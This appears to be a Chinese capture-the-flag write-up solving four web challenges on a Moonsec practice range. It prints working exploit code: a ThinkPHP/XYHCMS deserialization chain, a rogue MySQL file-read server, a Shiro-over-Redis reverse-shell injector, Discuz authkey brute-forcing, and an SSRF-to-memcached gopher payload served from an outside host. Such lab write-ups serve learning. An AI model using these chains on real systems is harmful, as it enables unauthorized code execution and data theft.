暗月2023中秋靶场WP

前言

首先感谢月师傅举办的中秋的活动,靶场做的很好而且很有趣,月师傅博客渗透测试培训-网络安全培训-暗月博客 (moonsec.com) 同时感谢月师傅送来的月饼,。

正文

首先用goby对103.108.67.223进行端口扫描(因为nmap太慢了)

FLAG1

http://103.108.67.223:8880/

网站最下面

Copyright © 2012-2018 某某公司 版权所有 Powered by EyouCms

EyouCms

扫描文件

打Nday

试了好几个漏洞

最终参考Eyoucms V1.5.X漏洞分析 - 徐野子 - 博客园 (cnblogs.com)

爆破token 用的go的 不知道为什么python爆破不出来

后台getshell 权限太小 看phpinfo 有disablefunction限制 不知道为什么蚁剑的插件不能过…

Releases · TarlogicSecurity/Chankro (github.com)

利用LDPRELOAD绕过但是没成功 

最后用.antproxy.php

moonsec_flag{2f0460e434a10e8912cOef6f630add2c

FLAG2

http://103.108.67.223:8866/

Copyright © 2014-2020 XYHCMS. 行云海软件 版权所有 Power by XYHCMS

XYHCMS

目录扫描

有个Install？？不知道有没有文件删除 搜索Nday

搜索到的第一个

痛失CVE之xyhcms(thinkphp3.2.3)反序列化 - FreeBuf网络安全行业门户

目录/App/Runtime/Data/config/是没有的 但是可以/App/Runtime/Data/

http://103.108.67.223:8866/App/Runtime/Data/d51694dcb61d76bef156076835ffd7e7_config/site.php

找到key：TlRAcBF8e

然后跑poc替换nikname

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{
    protected $options = array(
        PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    protected $config = array(
    "dsn"    => "mysql:host=localhost;dbname=xyhcms;port=3306",
    "username" => "root",
    "password" => "root"
        );
}

namespace Think;
class Model{
    protected $options   = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
        $this->db = new \Think\Db\Driver\Mysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array(
        "table" => "xyh_admin_log",
        "where" => "id=0"
        );
    }
}

namespace Think\Session\Driver;
class Memcache{
    protected $handle;
    public function __construct() {
        $this->handle = new \Think\Model();
    }
}

namespace Think\Image\Driver;
class Imagick{
    private $img;
    public function __construct() {
        $this->img = new \Think\Session\Driver\Memcache();
    }
}

namespace Common\Lib;
class SysCrypt{

    private $crypt_key;
    public function __construct($crypt_key) {
    $this -> crypt_key = $crypt_key;
    }
    public function php_encrypt($txt) {
    srand((double)microtime() * 1000000);
       $encrypt_key = md5(rand(0,32000));
       $ctr = 0;
       $tmp = '';
    for($i = 0;$i<strlen($txt);$i++) {
     $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
    }
    return base64_encode(self::__key($tmp,$this -> crypt_key));
    }
    
    public function php_decrypt($txt) {
    $txt = self::__key(base64_decode($txt),$this -> crypt_key);
       $tmp = '';
    for($i = 0;$i < strlen($txt); $i++) {
     $md5 = $txt[$i];
        $tmp .= $txt[++$i] ^ $md5;
    }
    return $tmp;
    }
    
    private function __key($txt,$encrypt_key) {
    $encrypt_key = md5($encrypt_key);
       $ctr = 0;
       $tmp = '';
    for($i = 0; $i < strlen($txt); $i++) {
     $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
    }
    
    public function __destruct() {
    $this -> crypt_key = null;
    }
}

function get_cookie($name, $key = '') {
    $key = '7q6Gw97sh';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}

function set_cookie($args, $key = '') {
    $key = 'TlRAcBF8e';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}

$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);

利用文章中的poc成功执行语句

然后又发现了文章xyhcms getshell_qq_42307546的博客-CSDN博客

不过可以直接用利用Gifts/Rogue-MySql-Server: Rogue MySql Server (github.com)我们直接搞flag

import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlers



PORT = 3306

log = logging.getLogger(__name__)

log.setLevel(logging.DEBUG)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
    tmp_format
)

filelist = (
    r'/flag',

)


#================================================
#=======No need to change after this lines=======
#================================================

__author__ = 'Gifts'

得到

moonsec_flag{f54d2bdb1f8c6a7996b0a0bf373997fd}

FLAG3

http://103.108.67.223:8089/

shrio+redis

做过类似的CTF题目

爆破redis密码拿到 abc123

之前月师傅的文章好像讲过这个问题shrio+redis

参考文章redis未授权到shiro反序列化 - 先知社区 (aliyun.com)

也可以直接参考（用cokeBeer师傅的没成功）

import pyyso
import socket

s=socket.socket()
s.connect(("127.0.0.1",6379))
whatever=b"123"
key=b"shiro:session:"+whatever
value=pyyso.cb1v192("反弹shell命令")  //注意要bash -c {} 同时编码↓
s.send(b"\x2a\x33\x0d\x0a\x24\x33\x0d\x0aSET\r\n\x24"+str(len(key)).encode()+b"\r\n"+key+b"\r\n\x24"+str(len(value)).encode()+b"\r\n"+value+b"\r\n")
if b"+OK" in  s.recv(3):
    print("success")

https://mp.weixin.qq.com/s/QvyVU6HXmxlfdkLwrH9vTw (月师傅之前的考核文章也有提到)

抓包修改JESSIONID 成功反弹 读取flag(反弹不超过就多试几次,或者写入key后用shiro的打法)

moonsec_flag{327a6c4304ad5938eaf0efb6cc3e53dc}

FLAG4

http://103.108.67.223:8822/forum.php

Powered by Discuz! X3.2

打了一天多没结果 后来看到月师傅群里说都是公开的

看http://103.108.67.223:8822/install/ 目录去翻阅文件

其中http://103.108.67.223:8822/install/data/ 里面有一个数据库有

(‘authkey’,’9f50c9zryqZt5FYA’);

Authkey?? 搜索相关的

参考文章

Discuz 搜索结果 - 像黑客一样学习 (hacking8.com)

VulWiki/Web安全/Discuz/Discuz! X < 3.4 authkey 算法的安全性漏洞.md at master · Ares-X/VulWiki (github.com)

DiscuzX3.3 authkey可爆破漏洞复现 - darkless

用fofa去看了其他站点 发现sstr不同都是不一样的 Cookie 前缀是已知的 注意修改

主要参考Discuz!-X-_-3.4-authkey-算法的安全性漏洞 - Discuz (hacking8.com)

# coding=utf-8
w_len = 10
result = ""
str_list = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
length = len(str_list)
for i in xrange(w_len):
    result+=" "
    result+=str(length-1)
    result+=" "
    result+="0 "
    result+=str(length-1)
    result+=" "
sstr = "t2xl"
for i in sstr:
    result+=str(str_list.index(i))
    result+=" "
    result+=str(str_list.index(i))
    result+=" "
    result+="0 "
    result+=str(length-1)
    result+=" "
print result

得到参数,使用php_mt_seed脚本

https://github.com/ianxtianxt/php-mt_rand

根据结果种子 然后生成随机字符串

<?php
function random($length) {
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000);
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
$fp = fopen('result.txt', 'rb');
$fp2 = fopen('result2.txt', 'wb');
while(!feof($fp)){
    $b = fgets($fp, 4096);
    if(preg_match("/seed = (\d)+/", $b, $matach)){
        $m = $matach[0];
    }else{
        continue;
    }
    // var_dump(substr($m,7));
    mt_srand(substr($m,7));
    fwrite($fp2, random(10)."\n");
}
fclose($fp);
fclose($fp2);

同时注意

生成https://www.openwall.com/php_mt_seed/参数

因为需要用来填充”result“

最后利用

# coding=utf-8
import itertools
import hashlib
import time
def dsign(authkey):
    url = "url"
    idstring = "vnY6nW"
    uid = 2
    uurl = "{}member.php?mod=getpasswd&uid={}&id={}".format(url, uid, idstring)
    url_md5 = hashlib.md5(uurl+authkey)
    return url_md5.hexdigest()[:16]
def main():
    sign = "af3b937d0132a06b"
    str_list = "0123456789abcdef"
    with open('result2.txt') as f:
        ranlist = [s[:-1] for s in f]
    s_list = sorted(set(ranlist), key=ranlist.index)
    r_list = itertools.product(str_list, repeat=6)
    print "[!] start running...."
    s_time = time.time()
    for j in r_list:
        for s in s_list:
            prefix = "".join(j)
            authkey = prefix + s
            # print dsign(authkey)
            if dsign(authkey) == sign:
                print "[*] found used time: " + str(time.time() - s_time)
                return "[*] authkey found: " + authkey

后来发现http://103.108.67.223:8822/config/config_global.php.bak

有信息泄露!??

// -------------------------- CONFIG MEMORY  --------------------------- //
$_config['memory']['prefix'] = 'Wzj0Ps_';
$_config['memory']['redis']['server'] = '';
$_config['memory']['redis']['port'] = 6379;
$_config['memory']['redis']['pconnect'] = 1;
$_config['memory']['redis']['timeout'] = '0';
$_config['memory']['redis']['requirepass'] = '';
$_config['memory']['redis']['serializer'] = 1;
$_config['memory']['memcache']['server'] = '127.0.0.1';
$_config['memory']['memcache']['port'] = 11211;
$_config['memory']['memcache']['pconnect'] = 1;
$_config['memory']['memcache']['timeout'] = 1;
$_config['memory']['apc'] = 1;
$_config['memory']['xcache'] = 1;
$_config['memory']['eaccelerator'] = 1;
$_config['memory']['wincache'] = 1;

同时查找几篇文章

Discuz!-X-authkeyMemcachessrf-getshell - Discuz (hacking8.com)

Discuz!-X3.4-Memcached未授权访问导致的rce - Discuz (hacking8.com)

poc:

http://103.148.244.120:8822/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://www.oosec.cn/poc.php?a.jpg[/img]

把这段payload放在服务器去请求

<?php
header("Location: gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%20162%0d%0aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A9%3A%22cat%20/flag%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D");
?>

第一次为解析,没注意到文章中

$payload['output']['preg']['search']['plugins']= "/.*/e";

/.*/e

最后用

<?php
header("Location: gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%20173%0D%0Aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A19%3A%22system('cat%20%2Fflag')%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D");
?>

拿到flag moonsec_flag{ae5cbc768cb85f87e83e8fe75fbcd1eb}